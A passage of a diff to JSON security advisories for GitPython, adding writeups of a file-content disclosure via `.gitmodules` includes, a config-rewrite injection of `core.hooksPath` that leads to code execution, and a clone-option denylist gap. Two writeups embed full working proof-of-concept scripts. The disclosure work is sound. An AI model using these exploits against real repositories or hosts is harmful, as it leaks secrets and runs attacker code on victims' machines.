for host fingerprinting. The primitive additionally serves as a generic error-based file-existence oracle for arbitrary host paths. This is materially stronger than the already-fixed, explicitly **blind** `GHSA-cwvm-v4w8-q58c` (\"Blind local file inclusion\", CVSS 4.0, `git/refs/symbolic.py` ref-name resolution) — that advisory's own writeup states it cannot disclose content; this one does, verbatim, via a different module (`git/config.py`'s include resolution).\n\n## Preconditions\n- Victim clones (or otherwise opens with GitPython) a repository whose `.gitmodules` is attacker-controlled — the default trust model for any tool that processes third-party repositories (dependency scanners, CI, code hosting/review bots, \"audit this repo\" utilities — exactly the class of application GitPython itself is built for).\n- Victim performs any operation that touches `repo.submodules` — one of the most ordinary GitPython operations, requiring no submodule `update`/`init`/checkout.\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py` — `GitConfigParser.__init__` defaults `merge_includes=True`.\n- `git/objects/submodule/base.py:273` — `SubmoduleConfigParser(fp_module, read_only=read_only)` passes neither `merge_includes` nor `repo=`; `git blame` shows this call unchanged since the class was introduced, and `git show 41ecc6a4` confirms that commit touched only `git/repo/base.py`'s `Repo.config_writer()`, never this call site.\n- `git/config.py` `_included_paths()`/`read()` (~630-685) — absolute include paths bypass the join/normpath entirely (`osp.isabs()` short-circuit); no repository-boundary containment check exists anywhere in this path.\n- `git/config.py` `_read()` (~493-498) — raises `cp.MissingSectionHeaderError(fpname, lineno, line)` with the raw file line embedded, matching Python stdlib `configparser`'s own `__str__` behavior.\n- `Submodule.iter_items()` catches only `(IOError, BadName)` — `configparser.Error` (the base of `MissingSectionHeaderError`) is not swallowed.\n- PoC (`gitpython-003-poc.py`, embedded below) reproduces this end-to-end against this exact checkout via the public API only (`Repo.clone_from` + `list(repo.submodules)`, default arguments, no monkeypatching), against both a throwaway secret file and `/etc/passwd`.\n\n## False-positive check (adversarial re-read)\n- **Is this the same bug as `GHSA-hmq2-w58f-27jc`?** No — that advisory is about the `.gitmodules` submodule *name* driving `_module_abspath`/`os.makedirs()` (creating a git repository/module directory outside the working tree, a write/RCE-adjacent primitive via a completely different function). This finding is about the `[include]` directive in the *same file* reaching a config-parser read primitive — a different mechanism, different function, different impact class (content disclosure, not directory creation).\n- **Is this the same bug as `GHSA-cwvm-v4w8-q58c` (blind LFI)?** No — that advisory is explicitly documented by its own reporter as content-free/blind (existence-only), and lives in `git/refs/symbolic.py`'s ref-name resolution feeding `Repo.commit`/`tree`/`index.diff` — an entirely different module and code path. This finding discloses actual file content via `git/config.py`'s include-directive resolution.\n- **Is the impact overstated given only one line leaks?** No — this is an accurate scoping caveat already reflected in the severity/impact discussion, not a reachability blocker: attacker has full control over which path is targeted (absolute paths work unconditionally), requires zero interaction beyond the single most common submodule operation, and the PoC demonstrates a real, working end-to-end disclosure through the standard `clone_from` + `list(repo.submodules)` workflow.\n- **Could the exception simply be silently swallowed by GitPython before reaching the caller?** No — confirmed by reading `Submodule.iter_items()`'s exception handling, which catches only `IOError`/`BadName`; `configparser.MissingSectionHeaderError` propagates uncaught.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently against both a throwaway secret file and `/etc/passwd`.\n\n## Remediation\nPass `merge_includes=False` when constructing `SubmoduleConfigParser` in `Submodule._config_parser()` (`git/objects/submodule/base.py`), mirroring the existing fix in `Repo.config_writer()` (commit `41ecc6a4`) — `.gitmodules` content is always attacker-controlled and should never be allowed to pull in `include`/`includeIf` directives. As defense in depth, `GitConfigParser.read()`'s include-path resolution should enforce that resolved include paths stay within the repository's own directory tree, and parsing-error messages (`MissingSectionHeaderError`/`ParsingError`) should avoid embedding raw file content when parsing a file the caller did not explicitly ask to open.\n\n## Confidence\nHigh. Root cause confirmed by direct code reading across both `git/config.py` and `git/objects/submodule/base.py`, cross-checked against the fix commit that hardened the sibling code path but not this one; exploit chain reproduced independently, twice, against the current HEAD (a throwaway secret file and `/etc/passwd`).\n\n\n## Proof-of-Concept source (`gitpython-003-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-003 PoC: `.gitmodules` -- fully attacker-controlled content shipped\ninside a cloned repository -- can contain `[include] path = `.\n`Submodule._config_parser()` builds the parser used for `repo.submodules` (and\nother submodule reads) via `SubmoduleConfigParser(fp_module, read_only=...)`\nwithout passing `merge_includes=False`, so the class default `merge_includes=True`\nis inherited. GitConfigParser then opens the target file; if it isn't valid\ngit-config syntax (true of virtually any non-gitconfig file), Python's\n`configparser.MissingSectionHeaderError` embeds the file's first line verbatim\nin its exception message, which propagates out of the ordinary, read-only\n`repo.submodules` call -- a non-blind local file content disclosure primitive.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-003-poc.py \n\nBenign: reads only the given (defaults to a throwaway secret file\ncreated under if omitted) and never writes/exfiltrates it anywhere\nexcept printing it locally to prove the primitive. No destructive action.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-003-poc\"\n target_file = sys.argv[2] if len(sys.argv) > 2 else os.path.join(workdir, \"secret.txt\")\n\n attacker_repo = os.path.join(workdir, \"attacker-repo\")\n dest = os.path.join(workdir, \"dest\")\n for p in (attacker_repo, dest):\n os.makedirs(p, exist_ok=True)\n\n if not os.path.exists(target_file):\n os.makedirs(os.path.dirname(target_file), exist_ok=True)\n with open(target_file, \"w\") as f:\n f.write(\"TOP-SECRET-DB-PASSWORD=hunter2-actual-secret-value\\n\")\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", attacker_repo], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"config\", \"user.email\", \"a@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"config\", \"user.name\", \"Attacker\"], check=True)\n\n with open(os.path.join(attacker_repo, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n\n with open(os.path.join(attacker_repo, \".gitmodules\"), \"w\") as f:\n f.write(\n '[submodule \"totally-normal-dep\"]\\n'\n \"\\tpath = vendor/dep\\n\"\n \"\\turl = https://example.com/dep.git\\n\"\n \"[include]\\n\"\n \"\\tpath = %s\\n\" % target_file\n )\n\n subprocess.run([\"git\", \"-C\", attacker_repo, \"add\", \"file.txt\", \".gitmodules\"], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n import configparser\n\n repo = git.Repo.clone_from(attacker_repo, dest)\n\n try:\n subs = list(repo.submodules)\n print(\"NOT VULNERABLE: no exception raised, submodules =\", subs)\n sys.exit(1)\n except configparser.MissingSectionHeaderError as e:\n msg = str(e)\n print(\"VULNERABLE: MissingSectionHeaderError leaked file content via repo.submodules:\")\n print(msg)\n with open(target_file) as f:\n first_line = f.readline().rstrip(\"\\n\")\n if first_line in msg:\n print(\"Confirmed: target file's first line is present verbatim in the exception message.\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: exception message did not contain the expected content\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78675" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2211" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/ef7568e3b317ce617eacda39b8b54dcdff8c3b5c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3785.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-78676.json b/advisories/BREW-tartufo-CVE-2026-78676.json index 70bc04b0378..df68a672052 100644 --- a/advisories/BREW-tartufo-CVE-2026-78676.json +++ b/advisories/BREW-tartufo-CVE-2026-78676.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-78676", "published": "2026-09-04T10:12:20Z", - "modified": "2026-09-05T10:16:40Z", + "modified": "2026-09-10T21:07:24Z", "upstream": [ "PYSEC-2026-3786", "CVE-2026-78676", @@ -52,21 +52,38 @@ } ] }, - "details": "GitPython before 3.1.59 fails to safely re-serialize multi-line git-config values during write operations, corrupting dormant quoted values into injected directives like core.hooksPath. Attackers can craft config files with embedded newlines that become live git directives after any unrelated GitPython config write, enabling arbitrary code execution via hook invocation.", + "summary": "GitPython: Dormant multi-line git-config values are corrupted into live injected directives (e.g. core.hooksPath) on any unrelated GitConfigParser write, enabling RCE", + "details": "- **CWE:** CWE-88 (Argument Injection) / CWE-94 (Code Injection) — via a read-then-corrupt-on-rewrite config round trip, not a direct setter argument\n- **Affected component:** `git/config.py` — `GitConfigParser._read()` (multi-line value decoding, lines 444-541, esp. `string_decode()` at line 460 and its call sites at 519/541) and `GitConfigParser._write()`/`write_section()` (serialization, lines ~694-712, esp. line 708)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\nGitPython added `UNSAFE_CONFIG_CHARS_RE` / `_value_to_string_safe()` / `_assure_config_name_safe()` guards (commits `c417af46`, `1ed1b924`, `a495ccd3`, and PR #2176) to reject a Python string containing a raw `\\r`/`\\n`/NUL byte, or syntax-bearing characters, when it is passed as an **argument** to `set()`, `set_value()`, `add_value()`, or `add_section()`. This closed the four config-injection GHSAs above.\n\nThat guard is applied only on the write-argument surface. It is never consulted for values that entered `GitConfigParser._sections` via `_read()` — i.e. values that came from parsing an on-disk config file. And `_read()` legitimately supports standard, spec-compliant git config syntax for multi-line values: a quoted value that is not closed on the same physical line continues onto the next physical line (git's own backslash-continuation syntax), and `string_decode()` (`.decode('unicode_escape')`) decodes a literal two-character `\\n` **escape sequence** inside such a value into a real embedded LF character in the resulting Python string. No raw control byte is ever written to disk to achieve this — it's the same syntax real `git` itself uses and accepts.\n\nThe bug is in what happens when that `GitConfigParser` is later **flushed**: `write_section()` (line ~694) calls the *unsafe* `self._value_to_string(v)` — not `_value_to_string_safe()` — and \"handles\" any embedded newline in the value with `.replace(\"\\n\", \"\\n\\t\")` (line 708), emitting a bare, unquoted `` in the output file with no re-quoting and no backslash-continuation marker. Real git does **not** treat an indentation-only continuation the way GitPython's writer assumes — a value only continues across physical lines when the *previous* line ends in a literal `\\` immediately before the newline. So the moment `write_section()` re-serializes a previously-decoded multi-line value this way, the second half of that value becomes an **independent, new config line** the next time anyone (GitPython or real `git`) parses the file. If an attacker chooses the dormant value's content to be `\\nhooksPath = `, that second line is parsed as a brand-new `core.hooksPath = ` directive — live, real Git configuration, not a value.\n\n`core.hooksPath` is honored by essentially every hook-firing git operation (`commit`, `checkout`, `merge`, `push`, `rebase`, ...), giving arbitrary code execution the next time the host application performs any hook-triggering operation.\n\n## Root cause\n`GitConfigParser`'s injection guard is asymmetric: it hardens every *write-argument* entry point (the fix for the four sibling GHSAs) but never hardens the **read → corrupt-on-rewrite round trip**. A value that is 100% legitimate and inert as parsed from disk becomes a newly-injected directive purely through GitPython's own broken re-serialization logic (`write_section()` using the unsafe value-to-string path plus a continuation scheme real git doesn't recognize). The `c417af46` commit message even states its intent explicitly: *\"This preserves existing read behavior for config files that already contain multiline values while preventing GitPython from writing new unsafe values\"* — i.e. the maintainers consciously scoped the fix to the write-argument surface and did not address what happens when an already-resident multi-line value gets rewritten.\n\n## Exploit path\n1. A `.git/config` (or any file merged into it via `[include]`, see below) already contains a dormant, syntactically-legitimate multi-line quoted value, e.g.:\n ```\n [core]\n \tzzz = \"A\\nhooksPath = ../evil-hooks\\\n \"\n ```\n No raw `\\r`, `\\n`, or NUL byte appears on disk — this is standard git quoting + backslash-continuation. Real `git config --get core.hookspath` returns nothing at this point (inert); `git config --get core.zzz` returns the decoded string `A\\nhooksPath = ../evil-hooks`, identically to GitPython's own reader.\n2. The host application opens this repo with GitPython (`git.Repo(path)`, `read_only=False` implicitly for a normal `config_writer()` use) and performs **any** single, unrelated, legitimate config write on the same `GitConfigParser` instance — e.g. `repo.config_writer().set_value(\"user\", \"name\", \"Test User\")`. This is one of the most ordinary operations a GitPython-based tool performs.\n3. `GitConfigParser._write()`/`write_section()` re-serializes every resident value, including the dormant `zzz` entry, using the unsafe path. The file on disk now contains, verbatim:\n ```\n [core]\n \t...\n \tzzz = A\n \thooksPath = ../evil-hooks\n ```\n4. Real `git config --get core.hookspath` now returns `../evil-hooks` — a key that did not exist before step 2, created purely by GitPython's own write.\n5. The next hook-firing git operation (e.g. `git commit`) executes `../evil-hooks/pre-commit` (or whatever hook name the operation looks for), i.e. arbitrary attacker-chosen code execution.\n\n## Impact\nArbitrary code execution, on par with (and more directly triggered than) the already-accepted, High-severity `GHSA-mv93-w799-cj2w`/`GHSA-v87r-6q3f-2j67` \"Newline injection... enables RCE via core.hooksPath\" advisories, and requiring **no unsafe caller argument at all** — only an attacker-influenced config file plus one ordinary, unrelated write.\n\n## Preconditions\n- A config file GitPython opens read-write already contains an attacker-chosen, syntactically-valid multi-line value shaped like `\\n = `. Realistic delivery:\n 1. **Pre-existing `.git` directory shipped with a repository** — vendored/template repos, CI workspace/layer caches that preserve `.git`, \"repo\" tarball/zip distributions that include `.git/config`. The poisoned value sits directly in `.git/config`.\n 2. **The documented shared-config `[include]` pattern** (`[include] path = ../`, pointing at a file inside the working tree) — `GitConfigParser.read()` merges included files' sections into the same `_sections` dict used for writing, so a malicious public repository can ship the poisoned value inside a normal tracked file and have it activated the first time any GitPython-based tool performs any unrelated config write after clone (this requires the victim's own `.git/config` to already reference the include, e.g. via project setup tooling that adds `include.path`).\n 3. **Any host application that opens an attacker-influenced config file for read-write and later performs a legitimate write** — the exact trust-boundary the maintainers already accepted as realistic for `GHSA-v87r-6q3f-2j67` (their writeup cites MLRun's `project.push()`).\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py:460` (`string_decode`), invoked at `git/config.py:519` and `:541` inside `_read()`'s multi-line handling — decodes `unicode_escape`, turning a literal `\\n` escape into a real embedded LF.\n- `git/config.py:~694-712` (`_write()`/`write_section()`) — uses `self._value_to_string(v)` (unsafe variant) and `.replace(\"\\n\", \"\\n\\t\")` with no re-quoting.\n- `c417af46` (the CR/LF/NUL guard commit) touches only the setter path and explicitly states it preserves existing *read* behavior for multi-line values, per its own commit message.\n- `git log -S\"string_decode\"`, `-S\"write_section\"`, `-S'replace(\"\\n\", \"\\n\\t\")'` on `git/config.py` show these code paths have only ever been touched by non-security formatting/refactor commits (`a5fc1d86`, `b825dc74`, `cb68eef0`, `21ec5299`), never by a security fix.\n- PoC (`gitpython-002-poc.py`, embedded below) reproduces the full chain end-to-end against this exact checkout: dormant value → one unrelated `config_writer()` write → `core.hookspath` becomes live per real `git config --get` → a subsequent `git commit` executes the injected hook and writes a benign marker file.\n\n## False-positive check (adversarial re-read)\n- **Is this just a repeat of the four already-fixed config-injection GHSAs?** No — all four require the *caller* to pass a Python string containing a raw control character or forbidden syntax character as an argument to a setter; all four are now blocked by `UNSAFE_CONFIG_CHARS_RE`/`VALID_CONFIG_OPTION_NAME_RE`/the section quote-state-machine. This finding requires no such caller argument: the payload is smuggled entirely inside a config *file* using standard, valid git escaping that the guard never inspects, and only becomes dangerous through GitPython's own unguarded re-serialization of a value it already holds. Confirmed via `_known-advisories.json` (26 entries, none withdrawn) — none describe this read→corrupt-on-rewrite mechanism.\n- **Does real git actually round-trip this value safely (i.e. is this a GitPython-only bug, not a \"normal\" file)?** Yes, confirmed empirically: after the same crafted `.git/config` is rewritten by *real* `git config user.name Test2` (a control test), the multi-line `zzz` entry is preserved byte-for-byte in its original quoted/continuation form — only GitPython's writer corrupts it.\n- **Is there a guard elsewhere that would catch the resulting bare `hooksPath = ...` line before it's trusted?** No — once on disk, it is indistinguishable from a directive the user set intentionally; `core.hooksPath` is honored unconditionally by git's hook-invocation machinery.\n- **Does this require an unrealistic precondition?** The precondition (a config file with attacker-influenced content, later legitimately rewritten) mirrors the exact threat model the maintainers already treated as realistic and fixed for `GHSA-v87r-6q3f-2j67`.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently end-to-end (dormant value in place → benign unrelated `config_writer()` write → `core.hookspath` live per real git → hook fires on `git commit`, marker file written).\n\n## Remediation\nEither (a) make `write_section()`/`_write()` use `_value_to_string_safe()` (or equivalent re-quoting) for **every** resident value, including those that originated from `_read()`, so an embedded newline is always re-emitted as a properly quoted+backslash-continued value rather than a bare new line, or (b) reject/neutralize embedded control characters in values at read time before they can reach `_sections` at all if the parser is opened in `read_only=False` mode, or (c) canonicalize output using git's own `git config --file --replace-all` semantics instead of a hand-rolled writer. Option (a) is the most surgical fix and matches the spirit of `_value_to_string_safe()` already used on the setter path.\n\n## Confidence\nHigh. Root cause independently re-derived and confirmed by direct code reading; full exploit chain (dormant value → benign unrelated write → live `core.hookspath` → hook execution with a benign marker) reproduced twice, independently, against the current HEAD.\n\n\n## Proof-of-Concept source (`gitpython-002-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-002 PoC: a dormant, legitimately-encoded multi-line git-config value\n(standard quoted + backslash-continuation syntax, containing an escaped \"\\\\n\"\nthat decodes to a real embedded newline in memory) is corrupted into a NEW,\nlive config key the moment GitConfigParser re-serializes it during any\nunrelated write. If the smuggled second \"line\" looks like\n\"hooksPath = \", it becomes a real, active core.hooksPath after\none unrelated GitPython config write, and fires attacker code on the next\nhook-triggering git operation (e.g. `git commit`).\n\nThis is CWE-88/CWE-94 style argument/config injection, but via the READ path\n(a config file GitPython parses and later rewrites), not via a Python kwarg\nargument -- distinct from the already-fixed GHSA-mv93-w799-cj2w /\nGHSA-v87r-6q3f-2j67 / GHSA-3rp5-jjmw-4wv2 / GHSA-jm78-9fvv-mhgr, which all\nguard the setter-argument surface only.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-002-poc.py \n\nBenign: only writes/reads inside . The \"malicious\" hook just writes a\nmarker file; no destructive/exfiltrating payload. Exits non-zero and prints\n\"NOT VULNERABLE\" if the corruption / hook does not fire.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-002-poc\"\n repo_dir = os.path.join(workdir, \"repo\")\n hooks_dir = os.path.join(workdir, \"evil-hooks\")\n marker = os.path.join(workdir, \"PWNED_MARKER.txt\")\n\n for p in (repo_dir, hooks_dir):\n os.makedirs(p, exist_ok=True)\n if os.path.exists(marker):\n os.remove(marker)\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", repo_dir], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.name\", \"Test\"], check=True)\n\n # Rewrite .git/config with a dormant, 100%-valid multi-line quoted value\n # inside [core] (before any other section). No raw CR/LF/NUL byte is\n # written to disk here -- this is standard git config quoting +\n # backslash-line-continuation, decoded by both real git and GitConfigParser\n # into the Python string 'A\\nhooksPath = ../evil-hooks'.\n cfg_path = os.path.join(repo_dir, \".git\", \"config\")\n with open(cfg_path) as f:\n original = f.read()\n poisoned_entry = '\\tzzz = \"A\\\\nhooksPath = ../evil-hooks\\\\\\n\"\\n'\n # Insert right after the [core] header line so it lives in the same section.\n new_config = original.replace(\"[core]\\n\", \"[core]\\n\" + poisoned_entry, 1)\n with open(cfg_path, \"w\") as f:\n f.write(new_config)\n\n # Confirm it's inert per real git before touching GitPython.\n pre = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if pre.returncode == 0:\n print(\"SETUP ERROR: core.hookspath already set before GitPython touched anything\")\n sys.exit(2)\n\n # Malicious hook: benign marker only.\n hook_path = os.path.join(hooks_dir, \"pre-commit\")\n with open(hook_path, \"w\") as f:\n f.write('#!/bin/sh\\necho \"PWNED-VIA-GITPYTHON-CONFIG-INJECTION\" > \"%s\"\\nexit 0\\n' % marker)\n os.chmod(hook_path, 0o755)\n\n import git # gitpython under test\n\n repo = git.Repo(repo_dir)\n before = repo.config_reader().get_value(\"core\", \"zzz\")\n print(\"core.zzz before any GitPython write =\", repr(before))\n\n # ONE totally unrelated, benign write -- this is the only \"attacker-adjacent\"\n # action required, and it is something virtually every GitPython consumer\n # does routinely (setting an option, adding a remote, updating a branch's\n # tracking config, ...).\n with repo.config_writer() as cw:\n cw.set_value(\"user\", \"name\", \"Test User\")\n\n post = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if post.returncode != 0:\n print(\"NOT VULNERABLE: core.hookspath still absent after the unrelated write\")\n sys.exit(1)\n\n injected_path = post.stdout.strip()\n print(\"core.hookspath is now LIVE after one unrelated write:\", injected_path)\n\n # Trigger the hook with a normal commit to prove it fires.\n with open(os.path.join(repo_dir, \"file2.txt\"), \"w\") as f:\n f.write(\"change\\n\")\n subprocess.run([\"git\", \"-C\", repo_dir, \"add\", \"file2.txt\"], check=True)\n subprocess.run(\n [\"git\", \"-C\", repo_dir, \"-c\", \"user.email=t@example.com\", \"-c\", \"user.name=T\",\n \"commit\", \"-q\", \"-m\", \"trigger hook\"],\n check=True,\n )\n\n if os.path.isfile(marker):\n with open(marker) as f:\n content = f.read().strip()\n print(\"VULNERABLE: hook fired, marker content =\", content)\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: hook did not fire\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78676" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3786.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-78677.json b/advisories/BREW-tartufo-CVE-2026-78677.json index d87cb75ef0e..06d9c952148 100644 --- a/advisories/BREW-tartufo-CVE-2026-78677.json +++ b/advisories/BREW-tartufo-CVE-2026-78677.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-78677", "published": "2026-09-04T10:12:20Z", - "modified": "2026-09-05T10:16:40Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "PYSEC-2026-3787", "CVE-2026-78677", @@ -52,21 +52,50 @@ } ] }, - "details": "GitPython before 3.1.59 omits --separate-git-dir from unsafe_git_clone_options, allowing attackers to create arbitrary git directories outside the intended clone destination. Attackers can pass a separate_git_dir parameter to Repo.clone_from() or Repo.clone() to redirect repository metadata to an attacker-controlled filesystem path, enabling arbitrary directory creation and potential hook execution.", + "summary": "GitPython: clone_from()/clone() omit --separate-git-dir from unsafe_git_clone_options, enabling arbitrary git-directory creation outside the destination", + "details": "- **CWE:** CWE-73 (External Control of File Name or Path) / CWE-22 (Path Traversal, in the \"escapes intended base directory\" sense)\n- **Affected component:** `git/repo/base.py`, `Repo.unsafe_git_clone_options` (class attribute, lines 153-165) and `Repo._clone()` (lines 1477-1520), reached via the public `Repo.clone_from()` (line 1626) and `Repo.clone()` (line 1567) APIs.\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`Repo.clone_from(url, to_path, **kwargs)` (and `Repo.clone()`) forward arbitrary keyword arguments to the underlying `git clone` invocation. Before forwarding, GitPython builds a candidate option list from the kwargs (`Git._option_candidates`) and checks it against a denylist, `Repo.unsafe_git_clone_options`, via `Git.check_unsafe_options()` — *unless* the caller passes `allow_unsafe_options=True`. This denylist mechanism is exactly the guard that the last ~16 published GHSAs against this repo (2026-07-12 → 2026-08-05) have repeatedly found incomplete or bypassable for other options (`--template`, `--upload-pack`, `--config`, `--exec`, `--output`, `--index-output`, `--pathspec-from-file`, etc.).\n\n`git clone` also accepts `--separate-git-dir=`, which redirects the repository's entire `.git` metadata directory to an **arbitrary, caller-controlled filesystem path**, leaving only a gitlink text file (`gitdir: `) at the intended destination. This is the exact same primitive already recognized as unsafe by GitPython's own code: `Repo.unsafe_git_init_options` (line 145-150) blocks `--separate-git-dir` for `Repo.init()`, with the comment *\"Redirects the repository metadata to a caller-controlled path\"*. The `Repo._clone()`/`clone()`/`clone_from()` docstring (line 1450-1452) is even more explicit:\n\n```\n:param allow_unsafe_options:\n Allow unsafe options to be used, such as ``--template`` and\n ``--separate-git-dir``.\n```\n\ni.e. the maintainers' own documentation states that `allow_unsafe_options=False` (the default) is supposed to block `--separate-git-dir` for clone. But **`Repo.unsafe_git_clone_options` does not contain it**:\n\n```python\nunsafe_git_clone_options = [\n \"--upload-pack\",\n \"-u\",\n \"--config\",\n \"-c\",\n \"--template\",\n \"--bundle-uri\",\n]\n```\n\nSo any application that forwards a `separate_git_dir` (or `separate-git-dir`) kwarg into `Repo.clone_from()` / `Repo.clone()` — e.g. a CI/build service, a Git-hosting proxy, or any tool that exposes a subset of clone options to a client, the exact threat model already accepted for the sibling `--template`/`--upload-pack`/`--config` entries in this same list — gets **no protection at all** for `--separate-git-dir`, even with the default `allow_unsafe_options=False`.\n\n## Root cause\nParity gap between two sibling denylists that guard the same underlying primitive (arbitrary redirection of git metadata storage): `unsafe_git_init_options` correctly lists `--separate-git-dir`; `unsafe_git_clone_options`, covering the same option on a different git subcommand that also accepts it, does not — despite the function's own docstring claiming otherwise. This is the same \"denylist omits an equally-dangerous sibling option\" pattern already responsible for `GHSA-539m-9xh6-q6rr` (`archive` denylist missing `--add-file`/`--add-virtual-file`) and `GHSA-6p8h-3wgx-97gf` (`clone` denylist missing `--template`, since fixed).\n\n## Exploit path\n1. Attacker-controlled input reaches a `separate_git_dir=...` (or equivalently `\"separate-git-dir\"`) keyword argument passed into `Repo.clone_from()` / `Repo.clone()` by the host application, with `allow_unsafe_options` left at its default `False`.\n2. `Git._option_candidates()` renders this as `--separate-git-dir` and `Git.check_unsafe_options()` checks it against `Repo.unsafe_git_clone_options` — no match, no `UnsafeOptionError` raised.\n3. `Git.transform_kwargs()` renders the same kwarg into the real command line as `--separate-git-dir=` and GitPython executes `git clone -v --separate-git-dir= -- ` via `subprocess` (no shell).\n4. `git` itself creates the full repository metadata tree (`config`, `description`, `HEAD`, `hooks/`, `index`, `objects/`, `refs/`, `packed-refs`, `logs/`) at the attacker-specified path — which can be **any path outside the intended clone destination** that the process has permission to create — and leaves a gitlink file at the intended destination pointing to it.\n\n## Impact\nArbitrary directory/file creation at a path fully controlled by the attacker (bounded only by filesystem permissions of the process running GitPython), matching the impact class of the already-published, High-severity `GHSA-hmq2-w58f-27jc` (\"Arbitrary Git Repository Creation Outside the Working Tree\", CVSS 8.2). Concretely:\n- Planting a git repository structure (including a `hooks/` directory) at an attacker-chosen location outside the sandboxed clone destination the calling application intended to confine the operation to.\n- If the attacker-chosen path collides with an existing directory the process can write into (e.g. another repository's `.git`, a shared cache path, a predictable temp location), the clone silently populates/overwrites `config`, `HEAD`, `hooks/*`, `refs/*`, `packed-refs`, and `index` there — an integrity violation of a resource outside the intended destination.\n- Combined with any later operation that runs `git` against that redirected/colliding directory (common in CI/build systems that reuse or predict working-directory layouts), this can escalate to hook execution, matching the RCE class already accepted for `--template` in `GHSA-9rj7-rf2p-w77r`.\n\n## Preconditions\n- The calling application forwards a caller-influenced value into a `separate_git_dir` kwarg of `Repo.clone_from()`/`Repo.clone()` (or into the `multi_options` list as a 